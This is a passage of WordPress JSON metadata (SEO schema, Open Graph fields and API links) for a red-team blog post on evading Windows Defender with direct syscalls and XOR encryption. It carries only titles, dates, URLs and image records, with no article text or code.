Teaming\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\",\"name\":\"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/image-1.png\",\"datePublished\":\"2025-04-07T22:00:19+00:00\",\"dateModified\":\"2026-06-12T17:21:48+00:00\",\"description\":\"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. 
Basic code is provided to start experimenting!\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/image-1.png\",\"contentUrl\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/image-1.png\",\"width\":979,\"height\":535,\"caption\":\"antivirus image\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/\",\"name\":\"Hackmosph\u00e8re\",\"description\":\"Votre s\u00e9curit\u00e9 nous tient 
hackeur.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#organization\",\"name\":\"Hackmosph\u00e8re\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/LOGO-removebg-preview-1.png\",\"contentUrl\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/LOGO-removebg-preview-1.png\",\"width\":503,\"height\":497,\"caption\":\"Hackmosph\u00e8re\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hackmosphere\\\/posts\\\/?feedView=all\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#\\\/schema\\\/person\\\/5821c6ff778edf6f4ebd2ee1f69fa937\",\"name\":\"hackmin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g\",\"caption\":\"hackmin\"},\"sameAs\":[\"https:\\\/\\\/www.hackmosphere.fr\"],\"url\":\"https:\\\/\\\/www.ha
ckmosphere.fr\\\/en\\\/author\\\/hackmin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere","description":"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","og_locale":"en_US","og_type":"article","og_title":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere","og_description":"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!","og_url":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","og_site_name":"Hackmosphere","article_published_time":"2025-04-07T22:00:19+00:00","article_modified_time":"2026-06-12T17:21:48+00:00","og_image":[{"width":979,"height":535,"url":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","type":"image\/png"}],"author":"hackmin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"hackmin","Est. 
reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#article","isPartOf":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/"},"author":{"name":"hackmin","@id":"https:\/\/www.hackmosphere.fr\/en\/#\/schema\/person\/5821c6ff778edf6f4ebd2ee1f69fa937"},"headline":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1","datePublished":"2025-04-07T22:00:19+00:00","dateModified":"2026-06-12T17:21:48+00:00","mainEntityOfPage":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/"},"wordCount":1855,"commentCount":0,"publisher":{"@id":"https:\/\/www.hackmosphere.fr\/en\/#organization"},"image":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#primaryimage"},"thumbnailUrl":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","articleSection":["Cyber Services","Red Team","Red 
Teaming"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","url":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","name":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere","isPartOf":{"@id":"https:\/\/www.hackmosphere.fr\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#primaryimage"},"image":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#primaryimage"},"thumbnailUrl":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","datePublished":"2025-04-07T22:00:19+00:00","dateModified":"2026-06-12T17:21:48+00:00","description":"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. 
Basic code is provided to start experimenting!","breadcrumb":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#primaryimage","url":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","contentUrl":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","width":979,"height":535,"caption":"antivirus image"},{"@type":"BreadcrumbList","@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.hackmosphere.fr\/en\/"},{"@type":"ListItem","position":2,"name":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1"}]},{"@type":"WebSite","@id":"https:\/\/www.hackmosphere.fr\/en\/#website","url":"https:\/\/www.hackmosphere.fr\/en\/","name":"Hackmosph\u00e8re","description":"Votre s\u00e9curit\u00e9 nous tient 
hackeur.","publisher":{"@id":"https:\/\/www.hackmosphere.fr\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.hackmosphere.fr\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.hackmosphere.fr\/en\/#organization","name":"Hackmosph\u00e8re","url":"https:\/\/www.hackmosphere.fr\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.hackmosphere.fr\/en\/#\/schema\/logo\/image\/","url":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2024\/06\/LOGO-removebg-preview-1.png","contentUrl":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2024\/06\/LOGO-removebg-preview-1.png","width":503,"height":497,"caption":"Hackmosph\u00e8re"},"image":{"@id":"https:\/\/www.hackmosphere.fr\/en\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.linkedin.com\/company\/hackmosphere\/posts\/?feedView=all"]},{"@type":"Person","@id":"https:\/\/www.hackmosphere.fr\/en\/#\/schema\/person\/5821c6ff778edf6f4ebd2ee1f69fa937","name":"hackmin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g","caption":"hackmin"},"sameAs":["https:\/\/www.hackmosphere.fr"],"url":"https:\/\/www.hackmosphere.fr\/en\/author\/hackmin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/posts\/2911","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hackmo
sphere.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/comments?post=2911"}],"version-history":[{"count":10,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/posts\/2911\/revisions"}],"predecessor-version":[{"id":4318,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/posts\/2911\/revisions\/4318"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/media\/2888"}],"wp:attachment":[{"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/media?parent=2911"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/categories?post=2911"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/tags?post=2911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}